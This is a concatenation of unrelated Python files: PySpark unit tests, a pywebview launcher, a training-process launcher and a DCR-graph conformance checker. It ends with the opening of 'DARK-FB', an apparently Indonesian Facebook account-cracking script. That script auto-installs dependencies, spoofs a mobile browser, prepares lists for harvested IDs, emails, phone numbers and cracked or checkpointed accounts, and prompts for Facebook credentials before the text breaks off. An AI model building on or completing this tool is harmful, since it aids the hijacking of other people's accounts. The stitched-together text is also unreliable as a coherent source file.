data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.job.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapreduce.job.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.job.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapreduce.output.fileoutputformat.outputdir": basepath + "/reserialize/newdataset"
}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
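        # poll until the sleeping task has written its daemon and worker pids to the temp file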
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
        self.assertFalse(t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
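        # fake a driver/worker Python version mismatch so the worker-side version check fails the job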
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
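        # lay out a minimal local Maven-style repo (pom plus a .py packed as a "jar") that --packages/--repositories can resolve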
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_user_configuration(self):
"""Make sure user configuration is respected (SPARK-19307)"""
script = self.createTempFile("test.py", """
|from pyspark import SparkConf, SparkContext
|
|conf = SparkConf().set("spark.test_config", "1")
|sc = SparkContext(conf = conf)
|try:
| if sc._conf.get("spark.test_config") != "1":
| raise Exception("Cannot find spark.test_config in SparkContext's conf.")
|finally:
| sc.stop()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local", script],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode, msg="Process failed with error:\n {0}".format(out))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
            post_parallelize_temp_files = os.listdir(sc._temp_dir)
            self.assertEqual(temp_files, post_parallelize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class KeywordOnlyTests(unittest.TestCase):
class Wrapped(object):
@keyword_only
def set(self, x=None, y=None):
if "x" in self._input_kwargs:
self._x = self._input_kwargs["x"]
if "y" in self._input_kwargs:
self._y = self._input_kwargs["y"]
return x, y
def test_keywords(self):
w = self.Wrapped()
x, y = w.set(y=1)
self.assertEqual(y, 1)
self.assertEqual(y, w._y)
self.assertIsNone(x)
self.assertFalse(hasattr(w, "_x"))
def test_non_keywords(self):
w = self.Wrapped()
self.assertRaises(TypeError, lambda: w.set(0, y=1))
def test_kwarg_ownership(self):
# test _input_kwargs is owned by each class instance and not a shared static variable
class Setter(object):
@keyword_only
def set(self, x=None, other=None, other_x=None):
if "other" in self._input_kwargs:
self._input_kwargs["other"].set(x=self._input_kwargs["other_x"])
self._x = self._input_kwargs["x"]
a = Setter()
b = Setter()
a.set(x=1, other=b, other_x=2)
self.assertEqual(a._x, 1)
self.assertEqual(b._x, 2)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
        self.assertEqual(3, stats_sample_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
main.py
|
from threading import Thread, Lock
import logging
import webview
from time import sleep
from server import run_server
server_lock = Lock()
logger = logging.getLogger(__name__)
def url_ok(url, port):
# Use httplib on Python 2
try:
from http.client import HTTPConnection
except ImportError:
from httplib import HTTPConnection
try:
conn = HTTPConnection(url, port)
conn.request("GET", "/")
r = conn.getresponse()
return r.status == 200
except:
logger.exception("Server not started")
return False
if __name__ == '__main__':
logger.debug("Starting server")
t = Thread(target=run_server)
t.daemon = True
t.start()
logger.debug("Checking server")
while not url_ok("127.0.0.1", 23948):
sleep(0.1)
logger.debug("Server started")
webview.create_window("My first pywebview application",
"http://127.0.0.1:23948",
min_size=(640, 480))
|
launcher.py
|
import argparse, yaml, os, signal
import multiprocessing
from athena import gpu_ops as ad
_procs = []
def signal_handler(signal, frame):
print("SIGINT signal caught, stop Training")
for proc in _procs:
proc.kill()
exit(0)
def launch(target, args):
file_path = args.config
settings = yaml.load(open(file_path).read(), Loader=yaml.FullLoader)
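    # export every key under 'shared' as an environment variable so the spawned processes inherit it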
for k, v in settings['shared'].items():
os.environ[k] = str(v)
args.num_local_worker = int(settings["launch"]["worker"])
for i in range(args.num_local_worker):
proc = multiprocessing.Process(target=start_worker, args=[target, args])
_procs.append(proc)
for i in range(int(settings["launch"]["server"])):
proc = multiprocessing.Process(target=start_server)
_procs.append(proc)
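    # a non-zero 'scheduler' entry in the launch config requests one scheduler process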
if settings["launch"]["scheduler"] != 0:
proc = multiprocessing.Process(target=start_sched)
_procs.append(proc)
signal.signal(signal.SIGINT, signal_handler)
for proc in _procs:
proc.start()
for proc in _procs:
proc.join()
def start_sched():
os.environ["DMLC_ROLE"] = "scheduler"
ad.scheduler_init()
ad.scheduler_finish()
def start_server():
os.environ["DMLC_ROLE"] = "server"
ad.server_init()
ad.server_finish()
def start_worker(target, args):
os.environ["DMLC_ROLE"] = "worker"
ad.worker_init()
target(args)
ad.worker_finish()
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument("config")
parser.add_argument("-n", type=int, default=1)
parser.add_argument("--sched", action="store_true")
args = parser.parse_args()
file_path = args.config
settings = yaml.load(open(file_path).read(), Loader=yaml.FullLoader)
for k, v in settings['shared'].items():
os.environ[k] = str(v)
if args.sched:
_procs.append(multiprocessing.Process(target=start_sched))
for i in range(args.n):
_procs.append(multiprocessing.Process(target=start_server))
for proc in _procs:
proc.start()
for proc in _procs:
proc.join()
__all__ = [
'launch'
]
|
main.py
|
"""The main file of the dcr-cc that is executed"""
from threading import Thread
import datetime
import process_mining.cmd_parser as cmd_parser
import process_mining.eventlog_parser as eventlog_parser
from process_mining.conf_data import ConformanceAnalysisData, TraceConformanceAnalysisData
from process_mining.graph import DCRGraph
from process_mining.marking import Marking
from process_mining.eventlog import Event
def perform_conformance_checking(trace, ca):
"""
The perform conformance checking method gets a trace as an input and then simulates the model with
the constraints retrieved from the DCR graph.
:param ca: The conformance analysis data object that is used for the overall conformance checking
:param trace: the trace that is checked within this thread
:return:
"""
marking = Marking.get_initial_marking()
trace_conformance_data = TraceConformanceAnalysisData(trace)
for event in trace.Events:
node = dcr_graph.get_node_by_name(event.EventName)
marking.perform_transition_node(node, event, trace_conformance_data)
pending_violation = False
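    # a response that is still pending and still included when the trace ends counts as a violation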
if len(marking.PendingResponse) != 0:
for pending in marking.PendingResponse:
if pending in marking.Included:
trace_conformance_data.add_violating_pending(pending.ActivityName)
pending_violation = True
time_stamp = None
    if trace.Events:
time_stamp = trace.Events[-1].Timestamp + datetime.timedelta(seconds=1)
trace.append_event(Event.create_end_event(time_stamp, pending_violation))
if trace_conformance_data.HasViolations:
ca.append_conformance_data(trace_conformance_data)
def main():
"""
Program main method starts by parsing the DCR graph afterwards retrieving the Event Log
subsequently the conformance is checked
:return:
"""
global dcr_graph
# input
dcr_graph = DCRGraph.get_graph_instance(xml_path)
event_log = eventlog_parser.get_event_log(data_path, custom_role)
ca = ConformanceAnalysisData()
# throughput
# if parallel is set: a thread pool is created
if parallel:
threads = []
for trace in event_log.Traces:
t = Thread(target=perform_conformance_checking, args=(trace, ca))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
# sequential conformance checking (Debugging purposes)
else:
for trace in event_log.Traces:
perform_conformance_checking(trace, ca)
# output
create_conformance_output(ca, event_log)
eventlog_parser.write_csv_file_to_disk_shift(event_log, output_pcm)
def create_conformance_output(ca, event_log):
"""
Creates the console output of the program
:param ca:
:param event_log:
:return:
"""
if len(ca.ViolatingTraces) > 0:
# Calculate ratios and replay fitness, Round up to two digits
violating_case_ratio = len(ca.ViolatingTraces) / len(event_log.Traces)
replay_fitness = 1 - violating_case_ratio
replay_fitness = "%.2f" % replay_fitness
violating_case_ratio *= 100
violating_case_ratio = "%.2f" % violating_case_ratio
conformance_ratio = 100 - float(violating_case_ratio)
# Output
        print('All in all, {} of {} traces violated the process model'.format(len(ca.ViolatingTraces), len(event_log.Traces)))
print('The ratio of violating cases is: {}%'.format(violating_case_ratio))
print("Thus, the conformance ratio is: {}%".format(conformance_ratio))
print("The replay fitness is: {}%".format(replay_fitness))
# Sort the dictionaries for the descending order of occurrences
sorted_including_violation = sorted(ca.ViolatedActivities.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_roles = sorted(ca.ViolatedRoles.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_pending = sorted(ca.ViolatedPending.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_connections = sorted(ca.ViolatedConnections.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_cases = sorted(ca.create_violated_traces_dict().items(), key=lambda kv: kv[1], reverse=True)
# Print all detailed information
print("\n{} process paths failed the events\n".format(len(sorted_violated_cases)))
for process_path in sorted_violated_cases:
print("The process path:\n\"{}\" \t was non-conformant {} times ".format(process_path[0], process_path[1]))
for included_violation in sorted_including_violation:
print('The activity \"{}\" has been executed {} times even though it was not included'.format(
included_violation[0], included_violation[1]))
for violated_role in sorted_violated_roles:
print('The role \"{}\" was misused \"{}\" times'.format(violated_role[0], violated_role[1]))
for violated_pending in sorted_violated_pending:
print('The activity {} was pending at the end in {} cases'.format(violated_pending[0], violated_pending[1]))
for violated_connection in sorted_violated_connections:
print('The {} was violated in {} traces'.format(violated_connection[0], violated_connection[1]))
else:
print('The conformance ratio is 100%')
def add_dcr_graph_for_test(test_graph):
"""
For unit tests with the main class a dcr graph can be added
:param test_graph: the created test graph
:return:
"""
global dcr_graph
dcr_graph = test_graph
if __name__ == '__main__':
# input parameters
args = cmd_parser.parse_args()
data_path = args.eventLog
xml_path = args.XmlDcr
output_pcm = args.outputPathPCM
custom_role = args.customRole
parallel = False
dcr_graph = None
columns_work = None
main()
|
aa.py
|
#!/usr/bin/python
# coding=utf-8
# (ZeDD) RedDemons
# Source : Python2 Gerak
# DARK-FB version1.7
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#- Exit -#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#- Colors -#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#- Animation -#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
        time.sleep(0.1)
##### LOGO #####
logo = """\033[1;93m█████████
\033[1;93m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;93m█\033[1;92m▼▼▼▼▼ \033[1;92m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;93m█ \033[1;92m \033[1;92m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;93m█\033[1;92m▲▲▲▲▲\033[1;92m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mDiamond-1
\033[1;93m█████████ \033[1;92m«----------✧----------»
\033[1;93m ██ ██
\033[1;93m╔════════════════════════════════════════════╗
\033[1;93m║\033[1;96m* \033[1;93mAuthor \033[1;93m: \033[1;93mBrother•|Mr.Rendy \033[1;93m ║
\033[1;93m║\033[1;96m* \033[1;93mGitHub \033[1;93m: \033[1;93m\033[4mMasi Rahasia Script Nya😑\033[0m \033[1;93m ║
\033[1;93m╚════════════════════════════════════════════╝"""
# loading dots #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Login selection #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
